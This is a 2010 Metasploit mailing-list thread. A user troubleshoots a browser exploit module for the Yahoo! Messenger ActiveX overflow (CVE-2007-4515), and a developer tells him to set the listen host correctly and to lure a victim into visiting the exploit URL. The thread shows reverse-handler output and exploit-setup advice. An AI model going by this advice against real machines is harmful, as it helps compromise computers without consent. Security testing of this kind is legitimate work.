Re: Help: Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow

[Julião Barbin <juliobarbin () hotmail com>]

Ok,Thanks for the help,jcb 



> Date: Sun, 25 Jul 2010 21:26:56 -0500
> From: jdrake () metasploit com
> To: juliobarbin () hotmail com
> CC: framework () spool metasploit com
> Subject: Re: [framework] Help: Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
>
> On Tue, Jul 20, 2010 at 12:09:08PM -0300, Juli?o Barbin wrote:
> > Good evening friends,
> > on my pc found the flaw Messenger ActiveX Control Buffer Overflow YVerInfo.dll then entered the site and searched 
> > the metasploit failure CVE-2007-4515, if the typed commands as the link 
> > http://www.metasploit.com/modules/exploit/windows/browser/yahoomessenger_fvcom
> > and ran the command exploit ... there was
> > [*] Exploit running the background job
> >
> > [-] Handler failed to bind to 10.20.4.63:4444 (where the machine is vulnerable)
> > [*] Started reverse handler on 0.0.0.0:4444
> > [*] Unsing URL: http://0.0.0.0:8080/S85gRUvyp0
> > [*] Local IP: http://10.20.6.126:8080 / S85gRUvyp0
> > [*] Server Started.
>
> You appear to have used LHOST incorrectly. Based on the output
> provided, you should set it to 10.20.6.126 (LHOST == listen host).
>
> After running the exploit, you'll still need to convince a user on
> that machine to visit your web site (http://10.20.6.126:8080/S85gRUvyp0)
>
> Hope this helps,
>
> -- 
> Joshua J. Drake
                                          
_________________________________________________________________
TRANSFORME SUAS FOTOS EM EMOTICONS PARA O MESSENGER. CLIQUE AQUI PARA COMEÇAR.
http://ilm.windowslive.com.br/?ocid=ILM:Live:Hotmail:Tagline:senDimensao:TRANSFORME78:-

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework